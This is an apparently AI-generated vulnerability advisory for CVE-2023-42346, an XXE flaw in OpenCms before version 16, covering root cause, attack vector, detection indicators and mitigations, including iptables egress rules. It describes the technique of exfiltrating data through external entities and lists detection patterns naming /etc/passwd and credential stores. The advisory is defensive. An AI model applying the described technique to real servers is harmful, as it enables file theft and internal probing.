CVE-2023-42346 Overview
CVE-2023-42346 is an XML External Entity (XXE) vulnerability affecting Alkacon OpenCms versions prior to 16. The flaw allows a remote, unauthenticated attacker to submit crafted XML containing a <!DOCTYPE> declaration that references an external host. The parser resolves the external entity, enabling out-of-band data exfiltration and server-side request forgery against internal resources. The weakness is classified as [CWE-611] Improper Restriction of XML External Entity Reference.
Critical Impact
Unauthenticated attackers can exploit the XML parser over the network to read sensitive files and probe internal services without user interaction.
Affected Products
- Alkacon OpenCms versions before 16
Discovery Timeline
- 2026-05-08 - CVE-2023-42346 published to NVD
- 2026-05-11 - Last updated in NVD database
Technical Details for CVE-2023-42346
Vulnerability Analysis
Alkacon OpenCms is a Java-based open-source content management system used to publish enterprise websites. The application accepts XML input through several content management workflows. Versions before 16 configure the underlying XML parser without disabling external entity resolution. When user-supplied XML contains a <!DOCTYPE> declaration that points to an external host, the parser fetches that resource and inlines the response.
An attacker can leverage this behavior to read local files via the file:// scheme, contact internal-only HTTP services, or trigger blind out-of-band callbacks to attacker-controlled infrastructure. The confidentiality impact is high, while integrity and availability remain unaffected per the published CVSS vector. Additional technical analysis is available in the Watchtowr Analysis on XXE in OpenCMS.
Root Cause
The root cause is a misconfigured XML parser that fails to disable Document Type Definition (DTD) processing and external entity resolution. Secure defaults such as FEATURE_SECURE_PROCESSING and disallow-doctype-decl are not enforced in the affected code paths.
Attack Vector
The attack vector is network-based and requires no authentication or user interaction. An attacker sends a crafted XML document to an OpenCms endpoint that accepts XML input. The XML payload defines an external entity referencing either a local file path or an attacker-controlled host. When the parser processes the document, it resolves the entity and exposes the contents through error messages, response bodies, or out-of-band channels.
No verified public proof-of-concept code is published in the NVD entry. The Watchtowr write-up referenced above documents the exploitation primitives observed against the affected endpoints.
Detection Methods for CVE-2023-42346
Indicators of Compromise
- Inbound HTTP requests to OpenCms containing <!DOCTYPE and SYSTEM keywords in request bodies or parameters.
- Outbound DNS or HTTP requests originating from the OpenCms host to unexpected external domains shortly after XML processing.
- Access log entries referencing XML upload, import, or content-creation endpoints with unusually large request bodies.
Detection Strategies
- Inspect web server and application logs for XML payloads referencing file://, http://, or ftp:// schemes inside DTD declarations.
- Deploy web application firewall rules that flag or block XML requests containing external entity declarations.
- Correlate outbound network connections from the OpenCms Java process against an allowlist of expected destinations.
Monitoring Recommendations
- Forward OpenCms application and access logs to a centralized analytics platform for retention and anomaly detection.
- Monitor for sudden access to sensitive local files such as /etc/passwd, application configuration, or credential stores by the Java runtime.
- Alert on DNS lookups from the OpenCms server resolving to interaction services commonly used in XXE exfiltration testing.
How to Mitigate CVE-2023-42346
Immediate Actions Required
- Upgrade Alkacon OpenCms to version 16 or later, which addresses the XML parser configuration.
- Restrict network egress from OpenCms servers so the application cannot reach arbitrary external hosts.
- Audit recent XML-processing endpoints for evidence of exploitation prior to patching.
Patch Information
Alkacon resolved the issue in OpenCms 16. Operators should upgrade to the fixed release and verify that XML parsing components used by custom modules also disable DTD processing. Refer to the Watchtowr Analysis on XXE in OpenCMS for context on the affected functionality.
Workarounds
- Place a reverse proxy or WAF in front of OpenCms to strip or reject requests containing <!DOCTYPE declarations.
- Disable XML import and content-upload endpoints for untrusted users until the upgrade is applied.
- Apply strict egress filtering so the application server cannot initiate outbound DNS or HTTP traffic to untrusted destinations.
# Example egress restriction using iptables to block outbound HTTP/HTTPS from the OpenCms host
iptables -A OUTPUT -p tcp --dport 80 -m owner --uid-owner tomcat -j REJECT
iptables -A OUTPUT -p tcp --dport 443 -m owner --uid-owner tomcat -j REJECT
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
